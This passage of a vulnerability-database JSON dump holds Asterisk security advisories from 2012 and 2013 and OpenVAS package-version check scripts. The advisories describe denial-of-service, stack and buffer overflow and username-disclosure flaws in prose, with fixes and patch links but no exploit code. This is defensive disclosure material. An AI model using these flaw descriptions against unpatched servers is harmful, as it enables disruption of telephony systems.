an active call. The concept of a \r\n device in Asterisk can include things that do not have a \r\n physical representation. One way that this currently occurs \r\n is when anonymous calls are allowed in Asterisk. A device \r\n is automatically created and stored in the cache for each \r\n anonymous call that occurs; this is possible in the SIP and \r\n IAX2 channel drivers and through channel drivers that \r\n utilize the res_jabber/res_xmpp resource modules (Gtalk, \r\n Jingle, and Motif). Attackers exploiting this vulnerability \r\n can attack an Asterisk system configured to allow anonymous \r\n calls by varying the source of the anonymous call, \r\n continually adding devices to the device state cache and \r\n consuming a system's resources. \r\n\r\n Resolution Channels that are not associated with a physical device are \r\n no longer stored in the device state cache. This affects \r\n Local, DAHDI, SIP and IAX2 channels, and any channel drivers \r\n built on the res_jabber/res_xmpp resource modules (Gtalk, \r\n Jingle, and Motif). \r\n\r\n Affected Versions\r\n Product Release Series \r\n Asterisk Open Source 1.8.x All Versions \r\n Asterisk Open Source 10.x All Versions \r\n Asterisk Open Source 11.x All Versions \r\n Certified Asterisk 1.8.11 All Versions \r\n Asterisk Digiumphones 10.x-digiumphones All Versions \r\n\r\n Corrected In\r\n Product Release \r\n Asterisk Open Source 1.8.19.1, 10.11.1, 11.1.1 \r\n Certified Asterisk 1.8.11-cert10 \r\n Asterisk Digiumphones 10.11.1-digiumphones \r\n\r\n Patches \r\n SVN URL Revision \r\n http://downloads.asterisk.org/pub/security/AST-2012-015-1.8.diff Asterisk \r\n 1.8 \r\n http://downloads.asterisk.org/pub/security/AST-2012-015-10.diff Asterisk \r\n 10 \r\n http://downloads.asterisk.org/pub/security/AST-2012-015-11.diff Asterisk \r\n 11 \r\n\r\n Links https://issues.asterisk.org/jira/browse/ASTERISK-20175 \r\n\r\n Asterisk Project Security Advisories are posted at \r\n http://www.asterisk.org/security \r\n \r\n This document may be superseded by later versions; if so, the latest \r\n version will be posted at \r\n http://downloads.digium.com/pub/security/AST-2012-015.pdf and \r\n http://downloads.digium.com/pub/security/AST-2012-015.html \r\n\r\n Revision History\r\n Date Editor Revisions Made \r\n 19 November 2012 Matt Jordan Initial Draft \r\n\r\n Asterisk Project Security Advisory - AST-2012-015\r\n Copyright (c) 2012 Digium, Inc. All Rights Reserved.\r\n Permission is hereby granted to distribute and publish this advisory in its\r\n original, unaltered form.\r\n", "edition": 1, "cvss3": {}, "published": "2013-01-05T00:00:00", "title": "AST-2012-015: Denial of Service Through Exploitation of Device State Caching", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5977"], "modified": "2013-01-05T00:00:00", "id": "SECURITYVULNS:DOC:28928", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28928", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "description": "\r\n\r\n Asterisk Project Security Advisory - AST-2012-014\r\n\r\n Product Asterisk \r\n Summary Crashes due to large stack allocations when using \r\n TCP \r\n Nature of Advisory Stack Overflow \r\n Susceptibility Remote Unauthenticated Sessions (SIP) \r\n \r\n Remote Authenticated Sessions (XMPP, HTTP) \r\n Severity Critical \r\n Exploits Known No \r\n Reported On 7 November, 2012 \r\n Reported By Walter Doekes \r\n Posted On 2 January, 2013 \r\n Last Updated On January 2, 2013 \r\n Advisory Contact Mark Michelson <mmichelson AT digium DOT com> \r\n CVE Name CVE-2012-5976 \r\n\r\n Description Asterisk has several places where messages received over \r\n various network transports may be copied in a single stack \r\n allocation. In the case of TCP, since multiple packets in a \r\n stream may be concatenated together, this can lead to large \r\n allocations that overflow the stack. \r\n \r\n In the case of SIP, it is possible to do this before a \r\n session is established. Keep in mind that SIP over UDP is \r\n not affected by this vulnerability. \r\n \r\n With HTTP and XMPP, a session must first be established \r\n before the vulnerability may be exploited. The XMPP \r\n vulnerability exists both in the res_jabber.so module in \r\n Asterisk 1.8, 10, and 11 as well as the res_xmpp.so module \r\n in Asterisk 11. \r\n\r\n Resolution Stack allocations when using TCP have either been eliminated \r\n in favor of heap allocations or have had an upper bound \r\n placed on them to ensure that the stack will not overflow. \r\n \r\n For SIP, the allocation now has an upper limit. \r\n \r\n For HTTP, the allocation is now a heap allocation instead of \r\n a stack allocation. \r\n \r\n For XMPP, the allocation has been eliminated since it was \r\n unnecessary. \r\n\r\n Affected Versions\r\n Product Release Series \r\n Asterisk Open Source 1.8.x All versions \r\n Asterisk Open Source 10.x All versions \r\n Asterisk Open Source 11.x All versions \r\n Certified Asterisk 1.8.11 SIP: unaffected \r\n \r\n HTTP and XMPP: All versions \r\n Asterisk Digiumphones 10.x-digiumphones All versions \r\n\r\n Corrected In\r\n Product Release \r\n Asterisk Open Source 1.8.19.1, 10.11.1, 11.1.1 \r\n Certified Asterisk 1.8.11-cert10 \r\n Asterisk Digiumphones 10.11.1-digiumphones \r\n\r\n Patches \r\n SVN URL Revision \r\n http://downloads.asterisk.org/pub/security/AST-2012-014-1.8.diff Asterisk \r\n 1.8 \r\n http://downloads.asterisk.org/pub/security/AST-2012-014-10.diff Asterisk \r\n 10 \r\n http://downloads.asterisk.org/pub/security/AST-2012-014-11.diff Asterisk \r\n 11 \r\n\r\n Links https://issues.asterisk.org/jira/browse/ASTERISK-20658 \r\n\r\n Asterisk Project Security Advisories are posted at \r\n http://www.asterisk.org/security \r\n \r\n This document may be superseded by later versions; if so, the latest \r\n version will be posted at \r\n http://downloads.digium.com/pub/security/AST-2012-014.pdf and \r\n http://downloads.digium.com/pub/security/AST-2012-014.html \r\n\r\n Revision History\r\n Date Editor Revisions Made \r\n 19 November, 2012 Mark Michelson Initial Draft \r\n 02 January, 2013 Matt Jordan Removed ABE from affected products \r\n\r\n Asterisk Project Security Advisory - AST-2012-014\r\n Copyright (c) 2012 Digium, Inc. All Rights Reserved.\r\n Permission is hereby granted to distribute and publish this advisory in its\r\n original, unaltered form.\r\n", "edition": 1, "cvss3": {}, "published": "2013-01-05T00:00:00", "title": "AST-2012-014: Crashes due to large stack allocations when using TCP", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976"], "modified": "2013-01-05T00:00:00", "id": "SECURITYVULNS:DOC:28927", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28927", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:47", "description": "\r\n\r\n Asterisk Project Security Advisory - AST-2013-001\r\n\r\n Product Asterisk \r\n Summary Buffer Overflow Exploit Through SIP SDP Header \r\n Nature of Advisory Exploitable Stack Buffer Overflow \r\n Susceptibility Remote Unauthenticated Sessions \r\n Severity Major \r\n Exploits Known No \r\n Reported On 6 January, 2013 \r\n Reported By Ulf Ha:rnhammar \r\n Posted On 27 March, 2013 \r\n Last Updated On March 27, 2013 \r\n Advisory Contact Jonathan Rose <jrose AT digium DOT com> \r\n CVE Name CVE-2013-2685 \r\n\r\n Description The format attribute resource for h264 video performs an \r\n unsafe read against a media attribute when parsing the SDP. \r\n The vulnerable parameter can be received as strings of an \r\n arbitrary length and Asterisk attempts to read them into \r\n limited buffer spaces without applying a limit to the \r\n number of characters read. If a message is formed \r\n improperly, this could lead to an attacker being able to \r\n execute arbitrary code remotely. \r\n\r\n Resolution Attempts to read string data into the buffers noted are now \r\n explicitly limited by the size of the buffers. \r\n\r\n Affected Versions\r\n Product Release Series \r\n Asterisk Open Source 11.x All Versions \r\n\r\n Corrected In \r\n Product Release \r\n Asterisk Open Source 11.2.2 \r\n\r\n Patches \r\n SVN URL Revision \r\n Http://downloads.asterisk.org/pub/security/AST-2013-001-11.diff Asterisk \r\n 11 \r\n\r\n Links https://issues.asterisk.org/jira/browse/ASTERISK-20901 \r\n\r\n Asterisk Project Security Advisories are posted at \r\n http://www.asterisk.org/security \r\n \r\n This document may be superseded by later versions; if so, the latest \r\n version will be posted at \r\n http://downloads.digium.com/pub/security/AST-2013-001.pdf and \r\n http://downloads.digium.com/pub/security/AST-2013-001.html \r\n\r\n Revision History\r\n Date Editor Revisions Made \r\n February 11, 2013 Jonathan Rose Initial Draft \r\n March 27, 2013 Matt Jordan CVE Added \r\n\r\n Asterisk Project Security Advisory - AST-2013-001\r\n Copyright (c) 2013 Digium, Inc. All Rights Reserved.\r\n Permission is hereby granted to distribute and publish this advisory in its\r\n original, unaltered form.\r\n", "edition": 1, "cvss3": {}, "published": "2013-04-01T00:00:00", "title": "AST-2013-001: Buffer Overflow Exploit Through SIP SDP Header", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2013-04-01T00:00:00", "id": "SECURITYVULNS:DOC:29220", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29220", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:47", "description": "\r\n\r\n Asterisk Project Security Advisory - AST-2013-003\r\n\r\n Product Asterisk \r\n Summary Username disclosure in SIP channel driver \r\n Nature of Advisory Unauthorized data disclosure \r\n Susceptibility Remote Unauthenticated Sessions \r\n Severity Moderate \r\n Exploits Known No \r\n Reported On January 30, 2013 \r\n Reported By Walter Doekes, OSSO B.V. \r\n Posted On February 21, 2013 \r\n Last Updated On March 27, 2013 \r\n Advisory Contact Kinsey Moore <kmoore@digium.com> \r\n CVE Name CVE-2013-2264 \r\n\r\n Description When authenticating via SIP with alwaysauthreject enabled, \r\n allowguest disabled, and autocreatepeer disabled, Asterisk \r\n discloses whether a user exists for INVITE, SUBSCRIBE, and \r\n REGISTER transactions in multiple ways. \r\n \r\n This information was disclosed: \r\n \r\n * when a "407 Proxy Authentication Required" response was \r\n sent instead of "401 Unauthorized" response. \r\n \r\n * due to the presence or absence of additional tags at the \r\n end of "403 Forbidden" such as "(Bad auth)". \r\n \r\n * when a "401 Unauthorized" response was sent instead of \r\n "403 Forbidden" response after a retransmission. \r\n \r\n * when retransmissions were sent when a matching peer did \r\n not exist, but were not when a matching peer did exist. \r\n\r\n Resolution This issue can only be mitigated by upgrading to versions of \r\n Asterisk that contain the patch or applying the patch. \r\n\r\n Affected Versions\r\n Product Release Series \r\n Asterisk Open Source 1.8.x All Versions \r\n Asterisk Open Source 10.x All Versions \r\n Asterisk Open Source 11.x All Versions \r\n Certified Asterisk 1.8.15 All Versions \r\n Asterisk Business Edition C.3.x All Versions \r\n Asterisk Digiumphones 10.x-digiumphones All Versions \r\n\r\n Corrected In\r\n Product Release \r\n Asterisk Open Source 1.8.20.2, 10.12.2, 11.2.2 \r\n Asterisk Digiumphones 10.12.2-digiumphones \r\n Certified Asterisk 1.8.15-cert2 \r\n Asterisk Business Edition C.3.8.1 \r\n\r\n Patches \r\n SVN URL Revision \r\nhttp://downloads.asterisk.org/pub/security/AST-2013-003-1.8.diff Asterisk \r\n 1.8 \r\nhttp://downloads.asterisk.org/pub/security/AST-2013-003-10.diff Asterisk \r\n 10 \r\nhttp://downloads.asterisk.org/pub/security/AST-2013-003-11.diff Asterisk \r\n 11 \r\nhttp://downloads.asterisk.org/pub/security/AST-2013-003-1.8.15-cert.diff Certified \r\n Asterisk \r\n 1.8.15 \r\nhttp://downloads.asterisk.org/pub/security/AST-2013-003-C.3.diff Asterisk \r\n BE C.3 \r\n\r\n Links https://issues.asterisk.org/jira/browse/ASTERISK-21013 \r\n\r\n Asterisk Project Security Advisories are posted at \r\n http://www.asterisk.org/security \r\n \r\n This document may be superseded by later versions; if so, the latest \r\n version will be posted at \r\n http://downloads.digium.com/pub/security/AST-2013-003.pdf and \r\n http://downloads.digium.com/pub/security/AST-2013-003.html \r\n\r\n Revision History\r\n Date Editor Revisions Made \r\n 2013-02-20 Kinsey Moore Initial revision. \r\n 2013-02-27 Kinsey Moore Added Asterisk BE patch information. \r\n 2013-02-27 Kinsey Moore Corrected open source Asterisk versions. \r\n\r\n Asterisk Project Security Advisory - AST-2013-003\r\n Copyright (c) 2013 Digium, Inc. All Rights Reserved.\r\n Permission is hereby granted to distribute and publish this advisory in its\r\n original, unaltered form.\r\n", "edition": 1, "cvss3": {}, "published": "2013-04-01T00:00:00", "title": "AST-2013-003: Username disclosure in SIP channel driver", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264"], "modified": "2013-04-01T00:00:00", "id": "SECURITYVULNS:DOC:29222", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29222", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:47", "description": "\r\n\r\n Asterisk Project Security Advisory - AST-2013-002\r\n\r\n Product Asterisk \r\n Summary Denial of Service in HTTP server \r\n Nature of Advisory Denial of Service \r\n Susceptibility Remote Unauthenticated Sessions \r\n Severity Major \r\n Exploits Known None \r\n Reported On January 21, 2013 \r\n Reported By Christoph Hebeisen, TELUS Security Labs \r\n Posted On March 27, 2013 \r\n Last Updated On March 27, 2013 \r\n Advisory Contact Mark Michelson <mmichelson AT digium DOT com> \r\n CVE Name CVE-2013-2686 \r\n\r\n Description AST-2012-014 [1], fixed in January of this year, contained a \r\n fix for Asterisk's HTTP server since it was susceptible to a \r\n remotely-triggered crash. \r\n \r\n The fix put in place fixed the possibility for the crash to be \r\n triggered, but a possible denial of service still exists if an \r\n attacker sends one or more HTTP POST requests with very large \r\n Content-Length values. \r\n \r\n [1] \r\n http://downloads.asterisk.org/pub/security/AST-2012-014.html \r\n\r\n Resolution Content-Length is now capped at a maximum value of 1024 \r\n bytes. Any attempt to send an HTTP POST with content-length \r\n greater than this cap will not result in any memory \r\n allocated. The POST will be responded to with an HTTP 413 \r\n "Request Entity Too Large" response. \r\n\r\n Affected Versions\r\n Product Release Series \r\n Asterisk Open Source 1.8.x 1.8.19.1, 1.8.20.0, 1.8.20.1 \r\n Asterisk Open Source 10.x 10.11.1, 10.12.0, 10.12.1 \r\n Asterisk Open Source 11.x 11.1.2, 11.2.0, 11.2.1 \r\n Certified Asterisk 1.8.15 1.8.15-cert1 \r\n Asterisk Digiumphones 10.x-digiumphones 10.11.1-digiumphones, \r\n 10.12.0-digiumphones, \r\n 10.12.1-digiumphones \r\n\r\n Corrected In\r\n Product Release \r\n Asterisk Open Source 1.8.20.2, 10.12.2, 11.2.2 \r\n Certified Asterisk 1.8.15-cert2 \r\n Asterisk Digiumphones 10.12.2-digiumphones \r\n\r\n Patches \r\n SVN URL Revision \r\nhttp://downloads.asterisk.org/pub/security/AST-2012-014-1.8.diff Asterisk \r\n 1.8 \r\nhttp://downloads.asterisk.org/pub/security/AST-2012-014-10.diff Asterisk \r\n 10 \r\nhttp://downloads.asterisk.org/pub/security/AST-2012-014-11.diff Asterisk \r\n 11 \r\nhttp://downloads.asterisk.org/pub/security/AST-2012-014-1.8.15-cert.diff Certified \r\n Asterisk \r\n 1.8.15 \r\n\r\n +------------------------------------------------------------------------+\r\n | Links | https://issues.asterisk.org/jira/browse/ASTERISK-20967 |\r\n | | http://telussecuritylabs.com/threats/show/TSL20130327-01 |\r\n +------------------------------------------------------------------------+\r\n\r\n Asterisk Project Security Advisories are posted at \r\n http://www.asterisk.org/security \r\n \r\n This document may be superseded by later versions; if so, the latest \r\n version will be posted at \r\n http://downloads.digium.com/pub/security/AST-2013-002.pdf and \r\n http://downloads.digium.com/pub/security/AST-2013-002.html \r\n\r\n Revision History\r\n Date Editor Revisions Made \r\n February 12, 2013 Mark Michelson Initial Draft \r\n March 27, 2013 Matt Jordan Updated CVE \r\n\r\n Asterisk Project Security Advisory - AST-2013-002\r\n Copyright (c) 2013 Digium, Inc. All Rights Reserved.\r\n Permission is hereby granted to distribute and publish this advisory in its\r\n original, unaltered form.\r\n", "edition": 1, "cvss3": {}, "published": "2013-04-01T00:00:00", "title": "AST-2013-002: Denial of Service in HTTP server", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2686"], "modified": "2013-04-01T00:00:00", "id": "SECURITYVULNS:DOC:29221", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29221", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-01-24T11:10:14", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-15567", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2018-01-24T00:00:00", "id": "OPENVAS:866888", "href": "http://plugins.openvas.org/nasl.php?oid=866888", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866888);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:05 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15567\");\n\n tag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\nall of the features you would expect from a PBX and more. Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 18\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-15567\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:13", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-15567", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310866888", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866888", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866888\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:05 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15567\");\n\n\n script_tag(name:\"affected\", value:\"asterisk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-15567\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:03", "description": "Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310892749", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892749", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2749.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2749-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892749\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2013-5642\", \"CVE-2013-5641\");\n script_name(\"Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-02 00:00:00 +0200 (Mon, 02 Sep 2013)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2749.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"asterisk on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\");\n script_tag(name:\"summary\", value:\"Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = 